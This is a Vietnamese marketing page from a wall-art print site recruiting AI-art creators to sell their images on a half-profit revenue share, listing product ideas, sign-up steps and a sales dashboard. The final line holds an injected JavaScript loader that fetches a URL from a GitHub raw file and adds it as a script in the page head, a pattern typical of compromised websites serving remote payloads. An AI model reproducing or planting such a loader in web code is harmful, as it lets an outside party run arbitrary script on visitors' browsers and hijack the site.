Kiếm thu nhập từ vẽ tranh AI

Giới thiệu

Bạn có biết: Đam mê vẽ AI của bạn cũng có thể tạo ra được Thu nhập cho bạn không? 

Bạn có thể bán các Sản phẩm thiết kế bằng AI của bạn trên chính website Tranh Trang Trí này bằng phương thức chia sẻ hợp tác và hưởng doanh thu trên mỗi đơn hàn bán được. 

Cách hợp tác rất đơn giản: 

  • Bạn sản xuất sản phẩm (theo ý bạn cùng với gợi ý của chúng tôi) 
  • Sau đó đưa lên Tranh Trang Trí để trưng bày
  • Chúng tôi sẽ truyền thông giúp bạn để khách vào mua tranh 
  • Khách chọn tranh của bạn và đặt hàng > Chúng tôi in ấn và lắp đặt tranh cho khách hàng 
  • Với mỗi lượt được lựa chọn, bạn sẽ được chi trả các chi phí cho mỗi lượt mua sản phẩm của khách hàng: mỗi 1 sản phẩm của bạn có thể bán được nhiều lần. 

Các đặc điểm chính của mô hình này đó là: 

  1. Minh bạch: Mọi giao dịch bạn đều có thể theo dõi được đơn hàng thực tế trên hệ thống. Bạn có riêng 1 hệ thống thống kê. 
  2. Lợi nhuận cao: Giá bán trên Tranh Trang Trí sau khi trừ đi các chi phí sản xuất gốc (in ấn, giao hàng), thì bạn sẽ được hưởng 1/2 số tiền thu được. Vì công sức của bạn xứng đáng như vậy! 
Ảnh: Trang thống kê riêng của từng Tài Khoản Nghệ Sĩ AI, bạn sẽ xem được từng giao dịch của những sản phẩm mà bạn tạo ra

 

Bạn sẽ bán thứ gì? Và Ai sẽ mua? 

Đừng nghĩ những bức tranh vẽ tay mới có thể bán được! Chúng ta thừa nhận rằng những Họa Sĩ vẽ tranh bằng tay đều có 1 thị phần không ai cạnh tranh được (traditional artists). 

Nhưng còn những người vẽ tranh bằng Công nghệ máy tính (thường được gọi là Digital Painting – hoặc là Digital Art) họ vẫn có thể tạo ra những sản phẩm hữu ích cho cộng đồng. 

Những sản phẩm của Digital Painting thường được gọi là “Sản Phẩm Nghệ Thuật Số” – chỉ những sản phẩm được tạo ra bằng máy tính (và cả bằng AI) 

Những sản phẩm “Nghệ thuật số” được dùng với mục đích trang trí nội thất, trang trí quán ăn, trang trí văn phòng – dù mọi người đều biết nó KHÔNG phải là Tranh Vẽ, nhưng tính hữu ích của nó khi dùng trang trí và tạo cảm xúc cho người vẫn có, và nhiều người vẫn thích dùng nó vì sự đa dạng, tiện lợi.

Ví dụ có những ngôi nhà họ muốn có 1 tác phẩm nghệ thuật Thị Giác có phong cách nghệ thuật trừu tượng mà họ thích, nhưng vẫn phải hòa trộn với mầu sắc của căn phòng họ đang sống: thì chỉ có những bức Digital Art mới có thể đáp ứng tốt nhất. 

Ví dụ như:

(Xem bài viết về Digital Painting để hiểu hơn >> Tại đây )

Rõ ràng, những Nghệ Sĩ vẽ tranh bằng AI cũng có những giá trị hữu ích riêng, vì nhu cầu cộng đồng cũng rất cao. Sau đây là những thứ mà Nghệ Sĩ AI có thể tạo ra cho cộng đồng và bán trên Tranh Trang Trí: 

  1. Những bức tranh Số được tạo ra từ AI (Treo tại nhà riêng, treo tại quán cafe, văn phòng) 
  2. Những bức tranh đồ họa “tranh trích dẫn” (quote art) hoặc “tranh trích từ” (quote illustration). Đây là những tác phẩm nghệ thuật kết hợp giữa hình ảnh và văn bản, thường chứa các trích dẫn, câu nói nổi tiếng, hoặc lời khuyên có ý nghĩa. Tranh trích dẫn thường được sử dụng làm trang trí nội thất cho Văn phòng, Doanh nghiệp v…v . 
  3. Những bức Ảnh AI Siêu Thực về các món ăn > được các nhà hàng trang trí và làm đẹp không gian. 
  4. Những bức tranh 3D tạo không gian mở > được các Chung cư có diện tích hẹp trang trí
  5. Những sản phẩm AI về những hình ảnh minh họa cho các câu chuyện ý nghĩa > được các Trường học, nhà trẻ mẫu giáo… sử dụng để mang tính Giáo dục hoặc truyền tải những thông điệp ý nghĩa, tích cực. 

 

PHƯƠNG THỨC HỢP TÁC BÁN HÀNG: 

Phương thức hợp tác bán hàng trên Sàn Bán Hàng rất đơn giản: 

  1. Bước 1 – Liên Hệ: Bạn thấy phù hợp, hãy liên hệ với chúng tôi, chúng tôi sẽ cho bạn biết thông tin, và thử tay nghề bằng 1 đề bài nào đó. 
  2. Bước 2 – Ký kết: Nếu chúng tôi thấy bạn đủ tiêu chuẩn, chúng ta sẽ ký kết hợp tác. 
  3. Bước 3 – Sản xuất: Chúng tôi đưa ra yêu cầu để bạn sản xuất nội dung – với sự hiểu biết thị trường, chúng tôi sẽ giúp bạn có được những chủ đề và đề bài phù hợp với nhu cầu thị trường và dễ bán nhất. 
  4. Bước 4 – Đăng tải: Chúng tôi sẽ tạo 1 tài khoản Nghệ Sĩ cho bạn trên SanBanHang và đăng sản phẩm của bạn lên đó. Cùng với tạo 1 tài khoản quản lý hiệu quả bán hàng (xem phần sau) 
  5. Bước 5 – Khách mua: Sau khi khách mua 1 đơn hàng trên hệ thống, bạn có thể kiểm tra được trạng thái đơn hàng ngay lập tức trong trang quản lý bán hàng (xem chi tiết phần sau): Trạng thái đơn hàng sẽ mô tả rõ các bước: Đặt hàng + ship hàng + đã thanh toán > để bạn cập nhật được trạng thái đơn hàng chính xác nhất. 
  6. Bước 6 – Thanh toán: Sau khi khách đã nhận hàng + thanh toán đầy đủ > bạn sẽ có 1 khoản tiền vào trong Tài khoản của Sanbanhang.vn > và bạn có thể thực hiện “Rút tiền” bất kỳ lúc nào.

 

Tài khoản quản lý và Cách kiểm soát hiệu quả bán hàng. 

Mỗi 1 Nghệ Sĩ AI khi “Gửi tranh” lên sàn thì sẽ được nhận 1 tài khoản quản lý các tranh của mình đang bán. 

Khi vào tài khoản quản lý này, bạn sẽ thấy được thực trạng bán hàng của tất cả những Tác phẩm Tranh AI của mình đang trong trạng thái bán hàng thế nào. Rất dễ quản lý và theo dõi theo thời gian thực. 

CLB NGHỆ SĨ AI 

Ngoài lợi ích từ việc bán các tác phẩm Digital Art, thì khi hợp tác với chúng tôi, bạn sẽ được tham gia vào hệ thống Nghệ Sĩ AI, và được chúng tôi trợ và huấn luyện đào tạo liên tục định kỳ. 

Bạn có thể tham khảo CLB Vẽ Tranh AI tại group Zalo này: https://zalo.me/g/xbbaqf012 

 

Click “Đăng kí tham gia” nếu bạn thấy hữu ích cho bạn.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)